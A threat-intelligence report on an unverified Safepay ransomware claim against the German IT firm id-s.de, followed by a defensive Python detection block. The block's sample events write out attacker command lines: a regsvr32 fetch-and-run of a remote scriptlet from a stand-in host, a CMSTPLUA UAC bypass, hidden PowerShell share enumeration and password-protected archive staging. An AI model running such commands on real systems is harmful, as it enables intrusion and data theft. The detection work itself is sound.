Low Unverified

id-s.de Ransomware Attack by Safepay (May 2026)

Unverified dark web claim. This report is based on a post observed on a dark web forum. Yazoul Security has not independently verified the authenticity of this claim.

Leak Site Screenshot

Leak site post claiming id-s.de data breach

Screenshot captured at time of discovery. Image blurred to protect victim PII.

Claim Summary

On May 6, 2026, the ransomware group known as Safepay posted a claim on their dark web leak site alleging a successful attack against id-s.de, a German technology company operating in digital technologies and IT-related services. According to the threat actor, they have exfiltrated data from the organization’s systems, though the volume of stolen information remains undisclosed. The group has not yet published any data samples or provided specific evidence to substantiate their claim.

This report is based solely on the leak site posting and has NOT been independently verified by Yazoul Security. Ransomware groups frequently exaggerate or fabricate claims to pressure victims into negotiations.

Threat Actor Profile

Safepay is a relatively obscure ransomware group with limited public track record. Based on available intelligence, the group has not been linked to a large number of confirmed victims, and no public research or YARA rules currently exist for their operations. This lack of visibility raises questions about their operational maturity and credibility.

The group’s known toolset includes:

  • Invoke-ShareFinder: Used for network share enumeration and data discovery
  • 7-Zip and WinRAR: Archive utilities for compressing stolen data
  • CMSTPLUA: A Microsoft-signed binary abused for privilege escalation
  • dllhost.exe and Regsvr32.exe: Legitimate Windows processes weaponized for code execution and persistence

These tools suggest Safepay relies on living-off-the-land (LotL) techniques and publicly available utilities rather than custom malware. This approach can make detection more challenging but also indicates a lower technical sophistication compared to established groups like LockBit or BlackCat.
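The tradecraft in that list maps cleanly onto process-creation telemetry. The block below is an added example, not part of the Yazoul report or any published Safepay rule set: it runs four such detections over constructed Sysmon-style events. The CMSTPLUA CLSID is the documented one for that COM object; the sample events, field values and rule patterns are assumptions for illustration.

```python
"""Process-creation detections for the living-off-the-land tradecraft in the
Safepay toolset (share enumeration, CMSTPLUA privilege escalation, regsvr32
and dllhost proxy execution, archive staging). Field names follow Sysmon
Event ID 1; the events below are constructed, not observed telemetry."""
import re

# Documented CLSID of the CMSTPLUA COM object (ICMLuaUtil). A dllhost.exe
# surrogate hosting it is the usual tell of the auto-elevation abuse.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

# (rule name, regex on lower-cased Image, regex on lower-cased CommandLine)
RULES = [
    ("share_enumeration", r"\\powershell\.exe$", r"invoke-sharefinder|sharefinder\.ps1"),
    ("cmstplua_uac_bypass", r"\\dllhost\.exe$",
     r"/processid:\s*" + re.escape(CMSTPLUA_CLSID.lower())),
    ("regsvr32_remote_scriptlet", r"\\regsvr32\.exe$",
     r"/i:\S*https?://|scrobj\.dll|\.sct\b"),
    # archive verb 'a' combined with a password (-p/-hp) or volume-split (-v) switch
    ("archive_staging", r"\\(7z|7za|rar|winrar)\.exe$", r"\ba\s.*\s-(p|hp|v\d)\S"),
]

SAMPLE_EVENTS = [  # constructed; EventId 5 and 6 are benign-looking controls
    {"EventId": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "Invoke-ShareFinder -CheckShareAccess"'},
    {"EventId": 2, "Image": r"C:\Windows\System32\dllhost.exe",
     "CommandLine": r"C:\Windows\System32\dllhost.exe /Processid:" + CMSTPLUA_CLSID},
    {"EventId": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
    {"EventId": 4, "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r"7z.exe a -p<redacted> -mhe=on -v500m D:\stage\fin.7z \\FILESRV\Finance"},
    {"EventId": 5, "Image": r"C:\Windows\System32\dllhost.exe",
     "CommandLine": r"C:\Windows\System32\dllhost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}"},
    {"EventId": 6, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
]

def evaluate(event):
    """Return the names of every rule whose Image and CommandLine patterns both match."""
    image, cmd = event.get("Image", "").lower(), event.get("CommandLine", "").lower()
    return [name for name, img_re, cmd_re in RULES
            if re.search(img_re, image) and re.search(cmd_re, cmd)]

def triage(events):
    """Map each matched rule name to the EventIds that triggered it."""
    hits = {}
    for ev in events:
        for rule in evaluate(ev):
            hits.setdefault(rule, []).append(ev["EventId"])
    return hits
```

Each rule requires both the image and the command line to match, so a routine dllhost.exe surrogate or a vendor DLL registration (events 5 and 6) produces no hit.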

Alleged Data Exposure

According to the leak site, Safepay claims to have accessed and exfiltrated data from id-s.de’s systems. The group states that id-s.de is “a German company operating in the field of digital technologies and IT-related services,” but provides no further details on the nature or sensitivity of the stolen information.

Key unknowns:

  • Data volume: Undisclosed
  • Data types: Not specified (could include customer records, internal communications, source code, or financial documents)
  • Proof of compromise: No samples or screenshots provided

The absence of evidence is notable. Established ransomware groups typically release proof-of-compromise files or screenshots to increase pressure on victims. Safepay’s failure to do so may indicate either a lack of actual access or a strategic decision to withhold evidence during early negotiation stages.

Potential Impact

If the claim is verified, the impact on id-s.de could include:

  • Operational disruption: Potential downtime from encryption or system lockout
  • Data breach liability: If customer or employee data was exfiltrated, regulatory obligations under GDPR may apply
  • Reputational damage: Clients and partners may question the company’s security posture
  • Financial costs: Ransom demands, forensic investigation, legal fees, and potential fines

Given id-s.de’s role in IT-related services, a breach could also affect downstream clients if the company manages third-party systems or data.

What to Watch For

  • Leak site updates: Monitor for any data samples, screenshots, or ransom notes posted by Safepay
  • Official statements: id-s.de may issue a public disclosure or notification to regulators
  • Dark web chatter: Other threat actors may reference or repost any leaked data
  • Detection guidance: As more intelligence on Safepay emerges, Yazoul Security will publish relevant YARA rules and detection signatures at /intel/

Disclaimer

This report is based on unverified claims made by the Safepay ransomware group on their dark web leak site. Yazoul Security has NOT independently confirmed the breach, data exfiltration, or any other details provided in this intelligence summary. Ransomware groups routinely fabricate or exaggerate claims to coerce victims into payment. Organizations should treat this information as unconfirmed until official verification is available. No PII, download links, or access credentials are included in this report.
